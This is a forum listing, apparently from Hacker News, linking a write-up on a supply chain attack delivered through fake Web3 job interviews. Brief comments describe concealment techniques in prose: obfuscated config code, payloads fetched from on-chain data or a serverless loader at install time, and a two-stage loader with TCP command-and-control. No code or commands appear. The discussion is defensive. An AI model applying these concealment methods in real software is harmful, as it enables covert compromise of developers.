Reverse-engineering a supply chain attack delivered via fake Web3 job interview(www.reymom.xyz)
1 pointby reymon-dev2 hours ago1 comment
  • _alphageek2 hours ago
    These attacks evolve each year. Initial ones were just obfuscated code inside some utilities jest/tailwind config, most sophisticated I have seen obfuscated code loaded on chain. So you can not find any trace in the packages, but when you start/install it loads transaction info - decode and boom - you are hacked. So the safest way not to run it or run in isolated docker environment.
    • reymon-dev2 hours ago
      Yeah... the on-chain payload delivery is a clever evolution, it removes the static artifact entirely. In this case they used a similar approach but with a Vercel-hosted serverless endpoint as the loader instead of on-chain data. Same principle, nothing malicious exists in the repo itself, payload is fetched at runtime. The two-stage split (ephemeral loader vs persistent TCP C2) was the part I hadn't seen well-documented before.